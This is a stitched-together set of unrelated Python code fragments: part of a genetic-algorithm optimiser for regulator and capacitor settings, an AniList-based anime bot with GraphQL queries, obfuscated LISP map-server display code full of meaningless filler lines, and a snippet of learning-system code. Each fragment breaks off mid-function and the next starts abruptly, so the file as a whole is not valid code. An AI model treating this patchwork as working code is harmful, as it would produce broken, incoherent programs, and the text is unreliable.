'cap': copy.deepcopy(bInd.cap),
'reg': copy.deepcopy(bInd.reg)}
# Get a well formatted string representation
self.baselineData['str'] = \
helper.getSummaryStr(costs=self.baselineData['costs'],
reg=self.baselineData['reg'],
cap=self.baselineData['cap'])
self.log.debug('Baseline individual data assigned.')
self.log.debug('Baseline costs:\n{}'.format(
json.dumps(bInd.costs, indent=4)))
# Sort the individualsList by score.
self.individualsList.sort(key=lambda x: x.costs['total'])
# Track best score for this generation.
self.generationBest.append(self.individualsList[0].costs['total'])
self.log.info('Lowest cost for this generation: {:.2f}'.format(
self.generationBest[-1]))
# Increment generation counter.
g += 1
# This could probably be refactored, but anyways...
# perform natural selection, crossing, mutation, and model runs if
# we're not in the last generation.
if g < self.numGen:
# Select the fittest individuals and some unfit ones.
self.naturalSelection()
msg = 'Natural selection complete for generation {}'.format(g)
self.log.info(msg)
# Measure diversity
# regDiff, capDiff = self.measureDiversity()
# Replenish the population by crossing and mutating individuals
# then run their models.
t0 = time.time()
model_count = self.crossMutateRun()
msg = 'Cross and mutate complete for generation {}.'.format(g)
self.log.info(msg)
msg = (' All models should now be running for generation {'
'}.').format(g + 1)
self.log.info(msg)
# Done.
self.log.info('Genetic algorithm complete.')
self.log.info('Lowest cost: {:.2f}'.format(self.generationBest[-1]))
# Return the best individual.
return self.individualsList[0]
def addToModelQueue(self, individual):
"""Helper function to put an individual and relevant inputs into a
dictionary to run a model.
"""
self.modelQueue.put_nowait({'individual': individual,
'strModel': self.strModel,
'inPath': self.inPath,
'outDir': self.outDir})
uid = individual.uid
self.log.debug(
'Individual with UID {} put in model queue.'.format(uid))
def naturalSelection(self):
"""Determines which individuals will be used to create next generation.
"""
# Determine how many individuals to keep for certain.
k = math.ceil(self.probabilities['top'] * len(self.individualsList))
self.log.debug('Keeping a minimum of {} individuals.'.format(k))
# Loop over the unfit individuals, and either delete or keep based on
# the weakProb
i = 0
while i < len(self.individualsList):
# If we are past the k'th individual and the random draw mandates
# it, kill it.
if (i >= k) and (random.random() < self.probabilities['weak']):
                # Remove individual from individualsList, cleanup.
ind = self.individualsList.pop(i)
self.log.debug(('Killing individual {} via natural '
+ 'selection').format(ind.uid))
self.popMgr.clean(tableSuffix=ind.tableSuffix, uid=ind.uid,
kill=True)
# No need to increment the index since we removed the
# individual.
continue
# Add the cost to the fit sum, increment the index. Note that the
# fit sum gets zeroed out in the 'prep' function
self.fitSum += self.individualsList[i].costs['total']
i += 1
self.log.debug(('Death by natural selection complete. There are {} '
+ 'surviving '
+ 'individuals.').format(len(self.individualsList)))
# Create weights by standard cost weighting.
self.rouletteWeights = []
for ind in self.individualsList:
self.rouletteWeights.append((ind.costs['total'] / self.fitSum))
'''
self.rouletteWeights.append(1 / (individual.costs['total']
/ self.fitSum))
'''
self.log.debug('Roulette weights assigned for each individual.')
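    # Worked example of the selection step above (numbers are assumptions, for
    # illustration only): with 20 individuals and probabilities['top'] == 0.2,
    # k = ceil(0.2 * 20) = 4, so the 4 lowest-cost individuals always survive;
    # each remaining individual is killed with probability probabilities['weak'].
    # Survivors' total costs are summed into fitSum, and each survivor is given
    # a roulette weight of costs['total'] / fitSum for the crossing step below.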
def crossMutateRun(self):
"""Crosses traits from surviving individuals to regenerate population,
then runs the new individuals to evaluate their cost.
"""
count = 0
# Loop until population has been replenished.
# Extract the number of individuals.
n = len(self.individualsList)
# chooseCount = []
while len(self.individualsList) < self.numInd:
if random.random() < self.probabilities['cross']:
# Since we're crossing over, we won't force a mutation.
forceMutate = False
# Prime loop to select two unique individuals. Loop ensures
# unique individuals are chosen.
_individualsList = [0, 0]
while _individualsList[0] == _individualsList[1]:
# Pick two individuals based on cumulative weights.
_individualsList = random.choices(
self.individualsList[0:n],
weights= \
self.rouletteWeights,
k=2)
# Keep track of who created these next individuals.
parents = (_individualsList[0].uid, _individualsList[1].uid)
self.log.debug(('Individuals {} and {} selected for '
+ 'crossing').format(parents[0], parents[1]))
# Cross the regulator chromosomes
regChroms = crossChrom(chrom1=_individualsList[0].regChrom,
chrom2=_individualsList[1].regChrom)
self.log.debug('Regulator chromosomes crossed.')
                # Cross the capacitor chromosomes
capChroms = crossChrom(chrom1=_individualsList[0].capChrom,
chrom2=_individualsList[1].capChrom)
self.log.debug('Capacitor chromosomes crossed.')
else:
# We're not crossing over, so force mutation.
forceMutate = True
# Draw an individual.
_individualsList = random.choices(self.individualsList[0:n],
weights=self.rouletteWeights,
k=1)
# Track parents
parents = (_individualsList[0].uid,)
self.log.debug(('No crossing, just mutation of individual '
+ '{}'.format(parents[0])))
# Grab the necessary chromosomes, put in a list
regChroms = [_individualsList[0].regChrom]
capChroms = [_individualsList[0].capChrom]
# Track chosen individuals.
"""
for i in _individualsList:
uids = [x[1] for x in chooseCount]
if i.uid in uids:
ind = uids.index(i.uid)
# Increment the occurence count
chooseCount[ind][2] += 1
else:
chooseCount.append([i.fitness, i.uid, 1])
"""
# Possibly mutate individual(s).
if forceMutate or (random.random() < self.probabilities['mutate']):
# Mutate regulator chromosome:
regChroms = mutateChroms(c=regChroms,
prob=self.probabilities['regMutate'])
self.log.debug('Regulator chromosome(s) mutated.')
# Mutate capacitor chromosome:
capChroms = mutateChroms(c=capChroms,
prob=self.probabilities['capMutate'])
self.log.debug('Capacitor chromosome(s) mutated.')
# Create individuals based on new chromosomes, add to list, put
# in queue for processing.
for i in range(len(regChroms)):
# Initialize new individual
uid = self.popMgr.getUID()
ind = individual(**self.indInputs,
uid=uid,
regChrom=regChroms[i],
capChrom=capChroms[i],
parents=parents,
)
self.log.debug('New individual, {}, initialized'.format(uid))
# Put individual in the list and the queue.
self.individualsList.append(ind)
self.addToModelQueue(individual=ind)
count += 1
self.log.debug(('Individual {} put in the model '
+ 'queue.').format(uid))
return count
"""
# Sort the chooseCount by number of occurences
chooseCount.sort(key=lambda x: x[2])
print('Fitness, UID, Occurences', flush=True)
for el in chooseCount:
print('{:.2f},{},{}'.format(el[0], el[1], el[2]))
"""
def measureDiversity(self):
"""Function to loop over chromosomes and count differences between
individuals. This information is useful in a histogram.
"""
# Compute diversity
n = 0
regDiff = []
capDiff = []
# Loop over all individuals in the list
for ind in self.individualsList:
n += 1
# Loop over all individuals later in the list
for i in range(n, len(self.individualsList)):
# Loop over reg chrom, count differences.
regCount = 0
for g in range(0, len(ind.regChrom)):
if ind.regChrom[g] != self.individualsList[i].regChrom[g]:
regCount += 1
regDiff.append(regCount)
# Loop over cap chrom, count differences.
capCount = 0
for g in range(0, len(ind.capChrom)):
if ind.capChrom[g] != self.individualsList[i].capChrom[g]:
capCount += 1
capDiff.append(capCount)
return regDiff, capDiff
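    # Hedged sketch of the intended use (not part of the original class): the
    # returned per-pair difference counts are meant to be histogrammed, e.g.
    #
    #   import matplotlib.pyplot as plt
    #   regDiff, capDiff = pop.measureDiversity()  # 'pop' is a population instance
    #   plt.hist(regDiff, bins=20)
    #   plt.xlabel('Differing regulator genes per pair of individuals')
    #   plt.show()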
def stopThreads(self, timeout=10):
"""Function to gracefully stop the running threads.
"""
# Signal to threads that we're done by putting 'None' in the queue.
for _ in self.modelThreads: self.modelQueue.put_nowait(None)
for t in self.modelThreads: t.join(timeout=timeout)
# print('Threads terminated.', flush=True)
def writeRunEval(modelQueue, costs, log):
# , cnxnpool):
# tEvent):
"""Write individual's model, run the model, and evaluate costs. This is
effectively a wrapper for individual.writeRunUpdateEval()
NOTE: will take no action if an individual's model has already been
run.
NOTE: This function is static due to the threading involved. This feels
memory inefficient but should save some headache.
NOTE: This function is specifically formatted to be run via a thread
object which is terminated when a 'None' object is put in the
modelQueue.
INPUTS:
modelQueue: queue which will have dictionaries inserted into it.
dictionaries should contain individual, strModel, inPath,
and outDir fields from a population object.
"""
while True:
try:
# Extract an individual from the queue.
inDict = modelQueue.get()
# Check input.
if inDict is None:
# If None is returned, we're all done here.
modelQueue.task_done()
break
uid = inDict['individual'].uid
log.debug('Pulled individual {} from model queue.'.format(uid))
# Write, run, update, and evaluate the individual.
inDict['individual'].writeRunUpdateEval(
strModel=inDict['strModel'],
inPath=inDict['inPath'],
outDir=inDict['outDir'],
costs=costs)
# Denote task as complete.
modelQueue.task_done()
log.debug(('Completed running individual {}. There are {} '
+ 'individuals left in the model '
+ 'queue.').format(uid, modelQueue.qsize()))
except:
print('Exception occurred!', flush=True)
error_type, error, traceback = sys.exc_info()
print(error_type, flush=True)
print(error, flush=True)
print(traceback, flush=True)
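# Hedged sketch of how this worker is typically wired up (the thread count and
# variable names below are illustrative, not taken from this module): each
# thread runs writeRunEval until a None sentinel arrives in the queue,
# mirroring stopThreads() above.
#
#   modelQueue = queue.Queue()
#   threads = [threading.Thread(target=writeRunEval,
#                               args=(modelQueue, costs, log))
#              for _ in range(numThreads)]
#   for t in threads: t.start()
#   # ... put work dictionaries into modelQueue ...
#   for _ in threads: modelQueue.put_nowait(None)  # signal shutdown
#   for t in threads: t.join()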
def mutateChroms(c, prob):
"""Take a chromosome and randomly mutate it.
INPUTS:
c: list of chromosomes, which are tuples of 1's and 0's. Ex:
(1, 0, 0, 1, 0)
prob: decimal in the interval [0.0, 1.0] determining the chance of
mutating (bit-flipping) an individual gene
"""
out = []
for chrom in c:
newC = list(chrom)
# count = 0
# Loop over the genes of this chromosome (not over the list of chromosomes).
for ind in range(len(chrom)):
if random.random() < prob:
# Flip the bit!
newC[ind] = 1 - newC[ind]
# count += 1
# Convert to tuple, put in output list
out.append(tuple(newC))
return out
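# Hedged usage sketch (illustrative helper, not part of the original module):
# with prob=1.0 every gene is flipped, with prob=0.0 the chromosomes come
# back unchanged.
def _mutate_chroms_example():
    assert mutateChroms(c=[(1, 0, 0, 1)], prob=1.0) == [(0, 1, 1, 0)]
    assert mutateChroms(c=[(1, 0, 0, 1)], prob=0.0) == [(1, 0, 0, 1)]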
def crossChrom(chrom1, chrom2):
"""Take two chromosomes and create two new ones.
INPUTS:
chrom1: tuple of 1's and 0's, same
import requests
import time
from bs4 import BeautifulSoup
from .helper import cflag, make_it_rw, pos_no, return_json_senpai, day_, season_
from .. import BOT_NAME
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup
from jikanpy import AioJikan
from datetime import datetime
ANIME_DB, MANGA_DB, CHAR_DB = {}, {}, {}
#### Anilist part ####
ANIME_TEMPLATE = """{name}
**ID | MAL ID:** `{idm}` | `{idmal}`
➤ **SOURCE:** `{source}`
➤ **TYPE:** `{formats}`{dura}{gnrs_}
{status_air}{user_data}
➤ **ADULT RATED:** `{adult}`
🎬 {trailer_link}
📖 <a href="{surl}">Synopsis</a>
📖 <a href="{url}">Official Site</a>
{additional}"""
# GraphQL Queries.
ANIME_QUERY = """
query ($id: Int, $idMal:Int, $search: String) {
Media (id: $id, idMal: $idMal, search: $search, type: ANIME) {
id
idMal
title {
romaji
english
native
}
format
status
episodes
duration
countryOfOrigin
source (version: 2)
trailer {
id
site
}
genres
relations {
edges {
node {
title {
romaji
english
}
id
}
relationType
}
}
nextAiringEpisode {
timeUntilAiring
episode
}
isAdult
isFavourite
mediaListEntry {
status
score
id
}
siteUrl
}
}
"""
ISADULT = """
query ($id: Int) {
Media (id: $id) {
isAdult
}
}
"""
BROWSE_QUERY = """
query ($s: MediaSeason, $y: Int, $sort: [MediaSort]) {
Page {
media (season: $s, seasonYear: $y, sort: $sort) {
title {
romaji
}
format
}
}
}
"""
FAV_ANI_QUERY = """
query ($id: Int, $page: Int) {
User (id: $id) {
favourites {
anime (page: $page, perPage: 10) {
pageInfo {
lastPage
}
edges {
node {
title {
romaji
}
siteUrl
}
}
}
}
}
}
"""
FAV_MANGA_QUERY = """
query ($id: Int, $page: Int) {
User (id: $id) {
favourites {
manga (page: $page, perPage: 10) {
pageInfo {
lastPage
}
edges {
node {
title {
romaji
}
siteUrl
}
}
}
}
}
}
"""
FAV_CHAR_QUERY = """
query ($id: Int, $page: Int) {
User (id: $id) {
favourites {
characters (page: $page, perPage: 10) {
pageInfo {
lastPage
}
edges {
node {
name {
full
}
siteUrl
}
}
}
}
}
}
"""
VIEWER_QRY = """
query {
Viewer{
id
name
siteUrl
statistics {
anime {
count
minutesWatched
episodesWatched
meanScore
}
manga {
count
chaptersRead
volumesRead
meanScore
}
}
}
}
"""
USER_QRY = """
query ($search: String) {
User (name: $search) {
id
name
siteUrl
statistics {
anime {
count
minutesWatched
episodesWatched
meanScore
}
manga {
count
chaptersRead
volumesRead
meanScore
}
}
}
}
"""
ANIME_MUTATION = """
mutation ($id: Int) {
ToggleFavourite (animeId: $id) {
anime {
pageInfo {
total
}
}
}
}"""
MANGA_MUTATION = """
mutation ($id: Int) {
ToggleFavourite (mangaId: $id) {
manga {
pageInfo {
total
}
}
}
}"""
CHAR_MUTATION = """
mutation ($id: Int) {
ToggleFavourite (characterId: $id) {
characters {
pageInfo {
total
}
}
}
}"""
ANILIST_MUTATION = """
mutation ($id: Int, $status: MediaListStatus) {
SaveMediaListEntry (mediaId: $id, status: $status) {
media {
title {
romaji
}
}
}
}"""
ANILIST_MUTATION_UP = """
mutation ($id: [Int], $status: MediaListStatus) {
UpdateMediaListEntries (ids: $id, status: $status) {
media {
title {
romaji
}
}
}
}"""
ANILIST_MUTATION_DEL = """
mutation ($id: Int) {
DeleteMediaListEntry (id: $id) {
deleted
}
}"""
AIR_QUERY = """
query ($id: Int, $idMal:Int, $search: String) {
Media (id: $id, idMal: $idMal, search: $search, type: ANIME) {
id
title {
romaji
english
}
status
countryOfOrigin
nextAiringEpisode {
timeUntilAiring
episode
}
siteUrl
isFavourite
mediaListEntry {
status
id
}
}
}
"""
DES_INFO_QUERY = """
query ($id: Int) {
Media (id: $id) {
id
description (asHtml: false)
}
}
"""
CHA_INFO_QUERY = """
query ($id: Int, $page: Int) {
Media (id: $id, type: ANIME) {
id
characters (page: $page, perPage: 25, sort: ROLE) {
pageInfo {
lastPage
total
}
edges {
node {
name {
full
}
}
role
}
}
}
}
"""
REL_INFO_QUERY = """
query ($id: Int) {
Media (id: $id, type: ANIME) {
id
relations {
edges {
node {
title {
romaji
}
}
relationType
}
}
}
}
"""
PAGE_QUERY = """
query ($search: String, $page: Int) {
Page (perPage: 1, page: $page) {
pageInfo {
total
}
media (search: $search, type: ANIME) {
id
idMal
title {
romaji
english
native
}
format
status
episodes
duration
countryOfOrigin
source (version: 2)
trailer {
id
site
}
genres
relations {
edges {
node {
title {
romaji
english
}
}
relationType
}
}
nextAiringEpisode {
timeUntilAiring
episode
}
isAdult
isFavourite
mediaListEntry {
status
score
id
}
siteUrl
}
}
}
"""
CHARACTER_QUERY = """
query ($id: Int, $search: String, $page: Int) {
Page (perPage: 1, page: $page) {
pageInfo{
total
}
characters (id: $id, search: $search) {
id
name {
full
native
}
image {
large
}
isFavourite
siteUrl
}
}
}
"""
MANGA_QUERY = """
query ($search: String, $page: Int) {
Page (perPage: 1, page: $page) {
pageInfo {
total
}
media (search: $search, type: MANGA) {
id
title {
romaji
english
native
}
format
countryOfOrigin
source (version: 2)
status
description(asHtml: true)
chapters
isFavourite
mediaListEntry {
status
score
id
}
volumes
averageScore
siteUrl
isAdult
}
}
}
"""
DESC_INFO_QUERY = """
query ($id: Int) {
Character (id: $id) {
image {
large
}
description(asHtml: false)
}
}
"""
LS_INFO_QUERY = """
query ($id: Int) {
Character (id: $id) {
image {
large
}
media (page: 1, perPage: 25) {
nodes {
title {
romaji
english
}
type
}
}
}
}
"""
ACTIVITY_QUERY = """
query ($id: Int) {
Page (perPage: 12) {
activities (userId: $id, type: MEDIA_LIST, sort: ID_DESC) {
...kek
}
}
}
fragment kek on ListActivity {
type
media {
title {
romaji
}
siteUrl
}
progress
status
}
"""
TOP_QUERY = """
query ($gnr: String, $page: Int) {
Page (perPage: 15, page: $page) {
pageInfo {
lastPage
total
}
media (genre: $gnr, sort: SCORE_DESC, type: ANIME) {
title {
romaji
}
}
}
}
"""
TOPT_QUERY = """
query ($gnr: String, $page: Int) {
Page (perPage: 15, page: $page) {
pageInfo {
lastPage
total
}
media (tag: $gnr, sort: SCORE_DESC, type: ANIME) {
title {
romaji
}
}
}
}
"""
ALLTOP_QUERY = """
query ($page: Int) {
Page (perPage: 15, page: $page) {
pageInfo {
lastPage
total
}
media (sort: SCORE_DESC, type: ANIME) {
title {
romaji
}
}
}
}
"""
GET_GENRES = """
query {
GenreCollection
}
"""
GET_TAGS = """
query{
MediaTagCollection {
name
isAdult
}
}
"""
async def get_all_tags(text: str = None):
vars_ = {}
result = await return_json_senpai(GET_TAGS, vars_, auth=False, user=None)
msg = "**Tags List:**\n\n`"
kek = []
for i in result['data']['MediaTagCollection']:
if text is not None and 'nsfw' in text:
if str(i['isAdult'])!='False':
kek.append(i['name'])
else:
if str(i['isAdult'])=='False':
kek.append(i['name'])
msg += ", ".join(kek)
msg += "`"
return msg
async def get_all_genres():
vars_ = {}
result = await return_json_senpai(GET_GENRES, vars_, auth=False)
msg = "**Genres List:**\n\n"
for i in result['data']['GenreCollection']:
msg += f"`{i}`\n"
return msg
async def get_user_activity(id_, user):
vars_ = {"id": id_}
result = await return_json_senpai(ACTIVITY_QUERY, vars_, auth=True, user=user)
data = result["data"]["Page"]["activities"]
msg = ""
for i in data:
try:
name = f"[{i['media']['title']['romaji']}]({i['media']['siteUrl']})"
if i['status'] in ["watched episode", "read chapter"]:
msg += f"⚬ {str(i['status']).capitalize()} {i['progress']} of {name}\n"
else:
msg += f"⚬ {str(i['status']).capitalize()} {name}\n"
except KeyError:
pass
btn = [[InlineKeyboardButton("Back", callback_data=f"getusrbc_{user}")]]
return f"https://img.anili.st/user/{id_}?a={time.time()}", msg, InlineKeyboardMarkup(btn)
async def get_top_animes(gnr: str, page, user):
vars_ = {"gnr": gnr.lower(), "page": int(page)}
query = TOP_QUERY
msg = f"Top animes for genre `{gnr.capitalize()}`:\n\n"
if gnr=="None":
query = ALLTOP_QUERY
vars_ = {"page": int(page)}
msg = f"Top animes:\n\n"
nsfw = False
result = await return_json_senpai(query, vars_, auth=False, user=user)
if len(result['data']['Page']['media'])==0:
query = TOPT_QUERY
msg = f"Top animes for tag `{gnr.capitalize()}`:\n\n"
result = await return_json_senpai(query, vars_, auth=False, user=user)
if len(result['data']['Page']['media'])==0:
return [f"No results Found"]
nsls = await get_all_tags('nsfw')
nsfw = True if gnr.lower() in nsls.lower() else False
data = result["data"]["Page"]
for i in data['media']:
msg += f"⚬ `{i['title']['romaji']}`\n"
msg += f"\nTotal available animes: `{data['pageInfo']['total']}`"
btn = []
if int(page)==1:
if int(data['pageInfo']['lastPage'])!=1:
btn.append([InlineKeyboardButton("Next", callback_data=f"topanimu_{gnr}_{int(page)+1}_{user}")])
elif int(page) == int(data['pageInfo']['lastPage']):
btn.append([InlineKeyboardButton("Prev", callback_data=f"topanimu_{gnr}_{int(page)-1}_{user}")])
else:
btn.append([
InlineKeyboardButton("Prev", callback_data=f"topanimu_{gnr}_{int(page)-1}_{user}"),
InlineKeyboardButton("Next", callback_data=f"topanimu_{gnr}_{int(page)+1}_{user}")
])
return [msg, nsfw], InlineKeyboardMarkup(btn) if len(btn)!=0 else ""
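# Hedged refactoring sketch: the prev/next button blocks above and in
# get_user_favourites below follow the same pattern; a helper along these
# lines could replace them. `make_page_buttons` and its callback format are
# illustrative names, not part of the original module.
def make_page_buttons(callback_prefix: str, page: int, last_page: int):
    row = []
    if page > 1:
        row.append(InlineKeyboardButton("Prev", callback_data=f"{callback_prefix}_{page - 1}"))
    if page < last_page:
        row.append(InlineKeyboardButton("Next", callback_data=f"{callback_prefix}_{page + 1}"))
    return [row] if row else []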
async def get_user_favourites(id_, user, req, page, sighs):
vars_ = {"id": int(id_), "page": int(page)}
result = await return_json_senpai(
FAV_ANI_QUERY if req=="ANIME" else FAV_CHAR_QUERY if req=="CHAR" else FAV_MANGA_QUERY,
vars_,
auth=True,
user=int(user)
)
data = result["data"]["User"]["favourites"]["anime" if req=="ANIME" else "characters" if req=="CHAR" else "manga"]
msg = "Favourite Animes:\n\n" if req=="ANIME" else "Favourite Characters:\n\n" if req=="CHAR" else "Favourite Manga:\n\n"
for i in data["edges"]:
msg += f"⚬ [{i['node']['title']['romaji'] if req!='CHAR' else i['node']['name']['full']}]({i['node']['siteUrl']})\n"
btn = []
if int(page)==1:
if int(data['pageInfo']['lastPage'])!=1:
btn.append([InlineKeyboardButton("Next", callback_data=f"myfavqry_{req}_{id_}_{str(int(page)+1)}_{sighs}_{user}")])
elif int(page) == int(data['pageInfo']['lastPage']):
btn.append([InlineKeyboardButton("Prev", callback_data=f"myfavqry_{req}_{id_}_{str(int(page)-1)}_{sighs}_{user}")])
else:
btn.append([
InlineKeyboardButton("Prev", callback_data=f"myfavqry_{req}_{id_}_{str(int(page)-1)}_{sighs}_{user}"),
InlineKeyboardButton("Next", callback_data=f"myfavqry_{req}_{id_}_{str(int(page)+1)}_{sighs}_{user}")
])
btn.append([InlineKeyboardButton("Back", callback_data=f"myfavs_{id_}_{sighs}_{user}")])
return f"https://img.anili.st/user/{id_}?a=({time.time()})", msg, InlineKeyboardMarkup(btn)
async def get_featured_in_lists(idm, req, auth: bool = False, user: int = None, page: int = 0):
vars_ = {"id": int(idm)}
OooO0OO . geo ) :
oOoOoOoo0 = lisp . lisp_print_cour ( OooO0OO . geo . print_geo_url ( ) )
i1I1i111Ii += "{}geo: {}<br>" . format ( o00o , oOoOoOoo0 )
if 74 - 74: O0 / i1IIi
if ( OooO0OO . elp ) :
iIi1i1iIi1iI = lisp . lisp_print_cour ( OooO0OO . elp . print_elp ( False ) )
i1I1i111Ii += "{}elp: {}<br>" . format ( o00o , iIi1i1iIi1iI )
if 78 - 78: OoooooooOO . OoO0O00 + ooOoO0o - i1IIi
if ( OooO0OO . rle ) :
IiIii1i111 = lisp . lisp_print_cour ( OooO0OO . rle . print_rle ( True , True ) )
i1I1i111Ii += "{}rle: {}<br>" . format ( o00o , IiIii1i111 )
if 31 - 31: OoooooooOO . OOooOOo
if ( OooO0OO . json ) :
Ii1 = lisp . lisp_print_cour ( OooO0OO . json . print_json ( True ) )
i1I1i111Ii += "{}json: {}<br>" . format ( o00o , Ii1 )
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
i1I1i111Ii += "<br>"
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
i1I1i111Ii += "</font>"
return ( i1I1i111Ii )
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
if 45 - 45: I1Ii111
if 83 - 83: OoOoOO00 . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
def Oooo00 ( ddt_entry , output ) :
I111iIi1 = ddt_entry . print_eid_tuple ( )
oo00O00oO000o = ddt_entry . map_referrals_sent
if 71 - 71: I1ii11iIi11i - ooOoO0o / OoOoOO00 * OoOoOO00 / i1IIi . i1IIi
if ( ddt_entry . is_auth_prefix ( ) ) :
output += lispconfig . lisp_table_row ( I111iIi1 , "--" , "auth-prefix" , "--" ,
oo00O00oO000o )
return ( [ True , output ] )
if 53 - 53: I1Ii111
if 21 - 21: I11i
for OoO00 in ddt_entry . delegation_set :
I1I11I1I1I = OoO00 . delegate_address
OO0Ooooo000Oo = str ( OoO00 . priority ) + "/" + str ( OoO00 . weight )
output += lispconfig . lisp_table_row ( I111iIi1 , I1I11I1I1I . print_address ( ) ,
OoO00 . print_node_type ( ) , OO0Ooooo000Oo , oo00O00oO000o )
if ( I111iIi1 != "" ) :
I111iIi1 = ""
oo00O00oO000o = ""
if 97 - 97: Ii1I * I1ii11iIi11i / I1IiiI / iIii1I11I1II1 % I11i
if 95 - 95: ooOoO0o + i11iIiiIii * I1Ii111 - i1IIi * I1Ii111 - iIii1I11I1II1
return ( [ True , output ] )
if 75 - 75: OoooooooOO * IiII
if 9 - 9: IiII - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
if 69 - 69: O0
if 85 - 85: ooOoO0o / O0
if 18 - 18: o0oOOo0O0Ooo % O0 * I1ii11iIi11i
if 62 - 62: I1Ii111 . IiII . OoooooooOO
if 11 - 11: OOooOOo / I11i
def oooO0 ( ddt_entry , output ) :
if 16 - 16: II111iiii + oO0o - OoooooooOO
if 3 - 3: O0 / iII111i
if 31 - 31: OOooOOo + o0oOOo0O0Ooo . OoooooooOO
if 89 - 89: II111iiii + i1IIi + II111iiii
if ( ddt_entry . group . is_null ( ) ) :
return ( Oooo00 ( ddt_entry , output ) )
if 7 - 7: O0 % o0oOOo0O0Ooo + I1ii11iIi11i * iII111i - iII111i
if 42 - 42: OoOoOO00 * OoOoOO00 * I1Ii111 . I11i
if ( ddt_entry . source_cache == None ) : return ( [ True , output ] )
if 51 - 51: OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o * iIii1I11I1II1 % OoO0O00
if 99 - 99: oO0o * II111iiii * I1Ii111
if 92 - 92: Oo0Ooo
if 40 - 40: OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
output = ddt_entry . source_cache . walk_cache ( Oooo00 ,
output )
return ( [ True , output ] )
if 93 - 93: II111iiii . I1IiiI - Oo0Ooo + OoOoOO00
if 61 - 61: II111iiii
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
if 90 - 90: iII111i
if 31 - 31: OOooOOo + O0
if 87 - 87: ooOoO0o
if 45 - 45: OoO0O00 / OoooooooOO - iII111i / Ii1I % IiII
if 83 - 83: I1IiiI . iIii1I11I1II1 - IiII * i11iIiiIii
def IiI11i1IIiiI ( ) :
oOOo000oOoO0 = "{} entries configured" . format ( lisp . lisp_ddt_cache . cache_size ( ) )
OoOo00o0OO = lisp . lisp_span ( "LISP-MS Configured Map-Server Peers & " + "Authoritative Prefixes:" , oOOo000oOoO0 )
if 1 - 1: I1IiiI % ooOoO0o
i1I1i111Ii = lispconfig . lisp_table_header ( OoOo00o0OO , "EID-Prefix or (S,G)" ,
"Peer Address" , "Delegation Type" , "Priority/Weight" ,
"Map-Referrals Sent" )
if 65 - 65: I1IiiI + OoOoOO00 / OOooOOo
i1I1i111Ii = lisp . lisp_ddt_cache . walk_cache ( oooO0 , i1I1i111Ii )
i1I1i111Ii += lispconfig . lisp_table_footer ( )
return ( i1I1i111Ii )
if 83 - 83: o0oOOo0O0Ooo . iII111i - Oo0Ooo
if 65 - 65: iIii1I11I1II1 / ooOoO0o . IiII - II111iiii
if 72 - 72: iIii1I11I1II1 / IiII % iII111i % OOooOOo - I11i % OOooOOo
if 100 - 100: Oo0Ooo + i11iIiiIii
if 71 - 71: I11i / o0oOOo0O0Ooo / I1Ii111 % OOooOOo
if 51 - 51: IiII * O0 / II111iiii . Ii1I % OOooOOo / I1IiiI
if 9 - 9: I1IiiI % I1IiiI % II111iiii
if 30 - 30: IiII + I1Ii111 - IiII . IiII - II111iiii + O0
def oOO0 ( input_str ) :
IIiiIiI1 , i1IIiIii1i , iiI11ii1I1 , ooOOO0OooOo = lispconfig . lisp_get_lookup_string ( input_str )
if 33 - 33: OOooOOo / i1IIi - I1IiiI % Oo0Ooo . I1ii11iIi11i
if 17 - 17: II111iiii / I1ii11iIi11i % IiII + I1IiiI * I1Ii111
i1I1i111Ii = "<br>"
if 36 - 36: I1Ii111 * OoO0O00
if 23 - 23: I11i . OoooooooOO - OOooOOo + IiII . II111iiii
if 54 - 54: ooOoO0o
if 67 - 67: OOooOOo . Oo0Ooo + OoOoOO00 - OoooooooOO
iiIiIIi = lisp . lisp_site_eid_lookup ( IIiiIiI1 , iiI11ii1I1 , i1IIiIii1i )
if ( iiIiIIi and iiIiIIi . is_star_g ( ) == False ) :
oOo0OOoO0 = iiIiIIi . print_eid_tuple ( )
OOOoO = lisp . green ( "registered" , True ) if iiIiIIi . registered else lisp . red ( "not registered" , True )
if 14 - 14: I11i . iIii1I11I1II1 . OoooooooOO . II111iiii / o0oOOo0O0Ooo
i1I1i111Ii += "{} '{}' {} {} {} {} {} {}" . format ( lisp . lisp_print_sans ( "Site" ) ,
# II111iiii % i11iIiiIii
lisp . lisp_print_cour ( iiIiIIi . site . site_name ) ,
lisp . lisp_print_sans ( "entry" ) ,
lisp . lisp_print_cour ( oOo0OOoO0 ) ,
lisp . lisp_print_sans ( "found for EID" ) ,
lisp . lisp_print_cour ( input_str ) ,
lisp . lisp_print_sans ( "site EID is" ) ,
lisp . lisp_print_cour ( OOOoO ) )
return ( i1I1i111Ii + "<br>" )
if 50 - 50: I1IiiI * i11iIiiIii
if 68 - 68: OOooOOo * O0 . I11i - II111iiii . ooOoO0o / II111iiii
if 47 - 47: OoooooooOO
if 4 - 4: I1IiiI % I11i
if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
o0oO00 , O0o , O0O0Oo00 = lisp . lisp_ms_compute_neg_prefix ( IIiiIiI1 , iiI11ii1I1 )
if 95 - 95: OoO0O00
if ( iiI11ii1I1 . is_null ( ) ) :
o0oO00 = lisp . lisp_print_cour ( o0oO00 . print_prefix ( ) )
else :
O0o = lisp . lisp_print_cour ( O0o . print_prefix ( ) )
o0oO00 = lisp
self.clause_modifiers = []
elif not isinstance(self.clause_modifiers, Collection):
self.clause_modifiers = [self.clause_modifiers]
for clause_modifier in self.clause_modifiers:
if not hasattr(clause_modifier, "learning_system") or \
clause_modifier.learning_system is None:
clause_modifier.learning_system = self.learning_system
clause_modifier.initialize()
self.theory_metric.initialize()
# noinspection PyMissingOrEmptyDocstring
@property
